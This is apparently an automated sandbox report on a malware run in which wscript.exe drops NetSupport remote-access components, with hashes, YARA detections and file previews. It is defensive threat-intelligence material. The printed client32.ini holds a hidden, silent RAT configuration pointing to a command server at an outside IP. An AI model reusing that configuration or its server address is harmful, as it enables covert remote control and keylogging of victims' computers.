                                                                                                                                                                              Size (bytes):6458
                                                                                                                                                                              Entropy (8bit):4.645519507940197
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                                                                              MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                                                                              SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                                                                              SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                                                                              SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                                                                                                                              C:\ProgramData\4dvs23l\PCICHEK.DLL

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18808
                                                                                                                                                                              Entropy (8bit):6.292094060787929
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                                                                                                              MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                                                                                                              SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                                                                                                              SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                                                                                                              SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\4dvs23l\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\PCICL32.DLL

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3740024
                                                                                                                                                                              Entropy (8bit):6.527276298837004
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                                                                                                              MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                                                                                                              SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                                                                                                              SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                                                                                                              SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\4dvs23l\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\4dvs23l\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\TCCTL32.DLL

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):396664
                                                                                                                                                                              Entropy (8bit):6.80911343409989
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                                                                                                              MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                                                                                                              SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                                                                                                              SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                                                                                                              SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\4dvs23l\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\client32.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):103824
                                                                                                                                                                              Entropy (8bit):6.674952714045651
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                                                                                                                              MD5:C4F1B50E3111D29774F7525039FF7086
                                                                                                                                                                              SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                                                                                                                              SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                                                                                                                              SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\4dvs23l\client32.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\client32.ini

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):671
                                                                                                                                                                              Entropy (8bit):5.43575482962587
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:KxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSue1ABEDEa:KI2hzEPI8ZNR8pivlnxOoG1fXXfD/X1J
                                                                                                                                                                              MD5:1F3911AA581F74218174A75D1D44AEBE
                                                                                                                                                                              SHA1:67CAC52F8457C77A93338109D6615145D1148E17
                                                                                                                                                                              SHA-256:010DC2CDBDBCA9199ACA04A93165259B48BBACAAFD142D0597E2B168B0C7809E
                                                                                                                                                                              SHA-512:C5D825BCD2C44F8E83EF1B3A0F185F93C23E365CFF55051231C676FC5B68DBF50EF7A6A466E1B2FD3B3C942B68270207E08EB18ABA04E768226419C8054AD30F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:0x4b88cba7....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=194.180.191.64:443..gskmode=0..GSK=EK:M?KCNHK;K?CEBHH>DAFEG..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

                                                                                                                                                                              C:\ProgramData\4dvs23l\install_state.json

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1794
                                                                                                                                                                              Entropy (8bit):3.5509498109363986
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                                                                                                                              MD5:3F78A0569C858AD26452633157103095
                                                                                                                                                                              SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                                                                                                                              SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                                                                                                                              SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

                                                                                                                                                                              C:\ProgramData\4dvs23l\msvcr100.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):773968
                                                                                                                                                                              Entropy (8bit):6.901559811406837
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                              MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                              SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                              SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                              SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\nskbfltr.inf

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:Windows setup INFormation
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                              Entropy (8bit):4.93007757242403
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                              MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                              SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                              SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                              SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                                                                              C:\ProgramData\4dvs23l\nsm_vpro.ini

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):46
                                                                                                                                                                              Entropy (8bit):4.532048032699691
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                                                              MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                                                              SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                                                              SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                                                              SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                                                                                              C:\ProgramData\4dvs23l\pcicapi.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):33144
                                                                                                                                                                              Entropy (8bit):6.7376663312239256
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                                                                                                              MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                                                                                                              SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                                                                                                              SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                                                                                                              SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\4dvs23l\pcicapi.dll, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\remcmdstub.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):63864
                                                                                                                                                                              Entropy (8bit):6.446503462786185
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                                                                                                              MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                                                                                                              SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                                                                                                              SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                                                                                                              SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\temp\ie_to_edge_bho.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):448576
                                                                                                                                                                              Entropy (8bit):6.6409578647273655
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:FB5DwLKugywR+FnkGMIj4fr2YOy+FI6TXezQhE41OqBPvOk7rYi:FBZwLGQ5yOy+FI6TzBPb
                                                                                                                                                                              MD5:85EA4587843113F286C07F68E1F52CDF
                                                                                                                                                                              SHA1:C0B0DCAFB5BC2BC0654C8D0A681D06E2594F385F
                                                                                                                                                                              SHA-256:F473B764AB15DFCD0C7009E9E48F9142FD8F9F2A16D183E700C6DFD428AB8DAA
                                                                                                                                                                              SHA-512:A2B4907A63273A75EA20052E4E83153DCFA246D5FC9C50BFD1B91CC25BF2F890D87AE47A30F0E362981455C89CF7F81026BF9F9D5DC5216143CED740484AE5CB
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...A.Pg.........."!.....$..........`.....................................................@A........................,...................h...............@(.......C..T...T...........................8B...............#...............................text....#.......$.................. ..`.rdata.......@.......(..............@..@.data....6...`.......@..............@....tls.................^..............@....rsrc...h............`..............@..@.reloc...C.......D...l..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\temp\ie_to_edge_bho_64.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):574536
                                                                                                                                                                              Entropy (8bit):6.399113968577245
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:Bak4zUeoZs4TB8D3qQAtoOk9SkxDgo5B8+ivLOLwR8Ph4ofUmJO6XvvLgAs:Bj44o4t8DaH/+SkbQv6LwR8PhAmJO6E
                                                                                                                                                                              MD5:ABAE72BACD4B539CD62AA59626A90929
                                                                                                                                                                              SHA1:2477B6F5A3243F373188ECEA06CA16D16793F915
                                                                                                                                                                              SHA-256:735BC62002B2841C5D1B156006B6A0AB94BCD475CC760C5161162429E1073883
                                                                                                                                                                              SHA-512:9AFE68B6C98D111A8579CDDC99E1293B2F5A032211E9DBDF44CC0774C867A7424253AEC8C42E3E73F1F6A45F7A9D8512B131609C5226BE0270C6593F6EED1DCF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...A.Pg.........." .....6...`.......c....................................... ......).....`A........................................@i.......j..........p....P..0K......H(...........[..T....................Z..(....R..@............p...............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data....N......."..................@....pdata..0K...P...L..................@..@.gxfg....*.......,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..............................@..@.rsrc...p...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\4dvs23l\temp\msedge.VisualElementsManifest.xml

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):441
                                                                                                                                                                              Entropy (8bit):5.256997510322464
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:ejHyWc4subuVFWod/NDhkQwYnF4kQwY+mTVWt/FhY+mTVWGJsU/FPpmTVWGJsU/M:ebvyWW/meZgWZgWJWIWJJdiHCM0N
                                                                                                                                                                              MD5:221557F3338A0DD4E4AD4579B909D8E3
                                                                                                                                                                              SHA1:F226CDAB51E29F5AFD1E603A723689D7B3F6334C
                                                                                                                                                                              SHA-256:98CE8D77442E9AA73045E453EC1AA318B99E541F1501F435AFAFBD76114CBC87
                                                                                                                                                                              SHA-512:B2456D29A9E457ED94D02649EAB39F686ED7E05535D68DB4CD3890EDBDFCBAD97C7F535B482090D5984A54EC00145C95B011B45139B492A355A092EFD08429EC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<Application xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>.. <VisualElements.. ShowNameOnSquare150x150Logo='on'.. Square150x150Logo='131.0.2903.99\VisualElements\Logo.png'.. Square70x70Logo='131.0.2903.99\VisualElements\SmallLogo.png'.. Square44x44Logo='131.0.2903.99\VisualElements\SmallLogo.png'.. ForegroundText='light'.. BackgroundColor='#173A73'.. ShortDisplayName='Edge'/>..</Application>..

                                                                                                                                                                              C:\ProgramData\4dvs23l\temp\quit_2.ico

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1823
                                                                                                                                                                              Entropy (8bit):7.663740629968921
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:6SOHKEc612W/BPc5IvL4j1ofmX3QMreyniI775z:ZWtc5Iu1LHQMrekJ
                                                                                                                                                                              MD5:CF7A50A53E98A83F59AFA2C605126A34
                                                                                                                                                                              SHA1:39CE4058CAF1FBECCA3661BB5167F5FE7825DA01
                                                                                                                                                                              SHA-256:6F1C7082E5D786E1D6DA082333A00CF6F0105D976877AFD2C39E40BF84BE640A
                                                                                                                                                                              SHA-512:312FDEDAC9538C40FF22F8819CEFD0D9CA46009C3BB79970D2C912DE0AB18039D335A5F6D146632D8AB06B3E1E99862AB0CA448E05A78648F177F6F4E660463B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:............ .N...6... .... .I.......00.... .R........PNG........IHDR................a....pHYs...t...t..f.x....IDAT8...=JCA....^.D..@.%.@.D.. XJP.%XX.....K%n.B,"Vbc........Tj1..;....|.3g~2AsX.^}.._....|...OE...R.k.$.:.p.*..........B?.~R+..7q..K...^....}<.!..z ...... .h...x.P\......q..77..H.....[.F..*.m........z..cJ........$.....S...8.l"..{.[.....'..kju..?<,...P.....IEND.B`..PNG........IHDR... ... .....szz.....pHYs...t...t..f.x....IDATX...?h.A...Or1j.......0.."."v..6.h......"...b!.vv.Z(..[)..6....+.O.5.bfq=n.....?.fv....7;oX`.e.......o..s...`7.bC.....Y.`=......{........p.[........m..F...uU..E.g..c.>E...5..d........x.`^.@.........K.....\.:.#...=.......8-$...$..q..b&..5.du2.?i.Q.......Y.~.t...@!.H..58...@.b_....e...p..[5..e..a.....!,..f...0.&^.X..1.$l.....pJX......@a.:...P....)x.:.0.>.d...p.Tf.......5.e<.7@;..P.......l4....r.^.....%=.....1x...Q..F;.1..*..|.E]^N.......N..fEj`.......}..>..W.ib;....V...s.mjZo%.../j8d.x......IEND.B`..PNG........IHDR...0...0...

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yyy[1].zip

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2741435
                                                                                                                                                                              Entropy (8bit):7.997442816788816
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:49152:ZZQdM9sL3HYZucbQlRsXwlKsaFnTT7Ejujwk/wGZ1f0ZjkJGwuPVuJREAED4T42u:TQdMeoocbQQXwlSTQju0k/wGvYk8wrRW
                                                                                                                                                                              MD5:2C83C4570B4773898A574E4143D11241
                                                                                                                                                                              SHA1:CD8632E7EDACE07CDDAB7D0B2BABECF12E58A102
